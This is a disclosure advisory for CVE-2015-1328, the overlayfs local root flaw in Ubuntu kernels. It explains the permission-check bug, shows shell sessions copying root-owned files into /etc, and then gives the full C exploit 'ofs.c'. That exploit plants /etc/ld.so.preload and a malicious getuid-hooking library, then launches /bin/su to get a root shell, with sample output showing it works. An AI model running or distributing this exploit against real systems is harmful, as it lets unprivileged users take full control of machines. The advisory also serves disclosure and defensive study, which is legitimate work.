Ubuntu 12.04 / 14.04 / 14.10 / 15.04 overlayfs Local Root

`The overlayfs filesystem does not correctly check file permissions when  
creating new files in the upper filesystem directory. This can be exploited  
by an unprivileged process in kernels with CONFIG_USER_NS=y and where  
overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs  
inside unprivileged mount namespaces. This is the default configuration of  
Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].  
  
If you don't want to update your kernel and you don't use overlayfs, a viable  
workaround is to just remove or blacklist overlayfs.ko / overlay.ko.  
  
Details  
================================  
  
>From Documentation/filesystems/overlayfs.txt [2]:  
  
"Objects that are not directories (files, symlinks, device-special  
files etc.) are presented either from the upper or lower filesystem as  
appropriate. When a file in the lower filesystem is accessed in a way  
the requires write-access, such as opening for write access, changing  
some metadata etc., the file is first copied from the lower filesystem  
to the upper filesystem (copy_up)."  
  
The ovl_copy_up_* functions do not correctly check that the user has  
permission to write files to the upperdir directory. The only permissions  
that are checked is if the owner of the file that is being modified has  
permission to write to the upperdir. Furthermore, when a file is copied from  
the lowerdir the file metadata is carbon copied, instead of attributes such as  
owner being changed to the user that triggered the copy_up_* procedures.  
  
Example of creating a 1:1 copy of a root-owned file:  
  
(Note that the workdir= option is not needed on older kernels)  
  
[email protected]:~$ ./create-namespace  
[email protected]:~# mount -t overlay -o  
lowerdir=/etc,upperdir=upper,workdir=work overlayfs o  
[email protected]:~# chmod 777 work/work/  
[email protected]:~# cd o  
[email protected]:~/o# mv shadow copy_of_shadow  
(exit the namespace)  
[email protected]:~$ ls -al upper/copy_of_shadow  
-rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow  
[email protected]:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode  
Device: 801h/2049d Inode: 939791 Links: 1  
Device: 801h/2049d Inode: 277668 Links: 1  
  
Now we can place this file in /etc by switching "upper" to be the lowerdir  
option, the permission checks pass since the file is owned by root and root  
can write to /etc.  
  
[email protected]:~$ ./create-namespace  
[email protected]:~# mount -t overlay -o  
lowerdir=upper,upperdir=/etc,workdir=work overlayfs o  
[email protected]:~# chmod 777 work/work/  
[email protected]:~# cd o  
[email protected]:~/o# chmod 777 copy_of_shadow  
[email protected]:~/o# exit  
[email protected]:~$ ls -al /etc/copy_of_shadow  
-rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow  
  
The attached exploit gives a root shell by creating a world-writable  
/etc/ld.so.preload file. The exploit has been tested on the most recent  
kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04.  
  
It is also possible to list directory contents for any directory on the system  
regardless of permissions:  
  
[email protected]:~$ ls -al /root  
ls: cannot open directory /root: Permission denied  
[email protected]:~$ mkdir o upper work  
[email protected]:~$ mount -t overlayfs -o  
lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work  
overlayfs /home/user/o  
[email protected]:~$ ls -al o 2>/dev/null  
total 8  
drwxrwxr-x 1 root nogroup 4096 May 24 16:33 .  
drwxr-xr-x 8 root nogroup 4096 May 24 16:33 ..  
-????????? ? ? ? ? ? .bash_history  
-????????? ? ? ? ? ? .bashrc  
d????????? ? ? ? ? ? .cache  
-????????? ? ? ? ? ? .lesshst  
d????????? ? ? ? ? ? linux-3.19.0  
  
  
Credit  
================================  
Philip Pettersson, Samsung SDS Security Center  
  
References  
================================  
[1] https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549  
[2] https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt  
[3] http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html  
  
  
--------------  
  
/*  
# Exploit Title: ofs.c - overlayfs local root in ubuntu  
# Date: 2015-06-15  
# Exploit Author: rebel  
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)  
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04  
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)  
  
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*  
CVE-2015-1328 / ofs.c  
overlayfs incorrect permission handling + FS_USERNS_MOUNT  
  
user@ubuntu-server-1504:~$ uname -a  
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs  
user@ubuntu-server-1504:~$ id  
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)  
user@ubuntu-server-1504:~$ ./ofs  
spawning threads  
mount #1  
mount #2  
child threads done  
/etc/ld.so.preload created  
creating shared library  
# id  
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)  
  
greets to beist & kaliman  
2015-05-24  
%rebel%  
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sched.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <sys/mount.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sched.h>  
#include <sys/stat.h>  
#include <sys/types.h>  
#include <sys/mount.h>  
#include <sys/types.h>  
#include <signal.h>  
#include <fcntl.h>  
#include <string.h>  
#include <linux/sched.h>  
  
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"  
  
static char child_stack[1024*1024];  
  
static int  
child_exec(void *stuff)  
{  
char *file;  
system("rm -rf /tmp/ns_sploit");  
mkdir("/tmp/ns_sploit", 0777);  
mkdir("/tmp/ns_sploit/work", 0777);  
mkdir("/tmp/ns_sploit/upper",0777);  
mkdir("/tmp/ns_sploit/o",0777);  
  
fprintf(stderr,"mount #1\n");  
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {  
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower  
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {  
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");  
exit(-1);  
}  
file = ".access";  
chmod("/tmp/ns_sploit/work/work",0777);  
} else file = "ns_last_pid";  
  
chdir("/tmp/ns_sploit/o");  
rename(file,"ld.so.preload");  
  
chdir("/");  
umount("/tmp/ns_sploit/o");  
fprintf(stderr,"mount #2\n");  
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {  
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {  
exit(-1);  
}  
chmod("/tmp/ns_sploit/work/work",0777);  
}  
  
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);  
umount("/tmp/ns_sploit/o");  
}  
  
int  
main(int argc, char **argv)  
{  
int status, fd, lib;  
pid_t wrapper, init;  
int clone_flags = CLONE_NEWNS | SIGCHLD;  
  
fprintf(stderr,"spawning threads\n");  
  
if((wrapper = fork()) == 0) {  
if(unshare(CLONE_NEWUSER) != 0)  
fprintf(stderr, "failed to create new user namespace\n");  
  
if((init = fork()) == 0) {  
pid_t pid =  
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);  
if(pid < 0) {  
fprintf(stderr, "failed to create new mount namespace\n");  
exit(-1);  
}  
  
waitpid(pid, &status, 0);  
  
}  
  
waitpid(init, &status, 0);  
return 0;  
}  
  
usleep(300000);  
  
wait(NULL);  
  
fprintf(stderr,"child threads done\n");  
  
fd = open("/etc/ld.so.preload",O_WRONLY);  
  
if(fd == -1) {  
fprintf(stderr,"exploit failed\n");  
exit(-1);  
}  
  
fprintf(stderr,"/etc/ld.so.preload created\n");  
fprintf(stderr,"creating shared library\n");  
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);  
write(lib,LIB,strlen(LIB));  
close(lib);  
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");  
if(lib != 0) {  
fprintf(stderr,"couldn't create dynamic library\n");  
exit(-1);  
}  
write(fd,"/tmp/ofs-lib.so\n",16);  
close(fd);  
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");  
execl("/bin/su","su",NULL);  
}  
  
  
`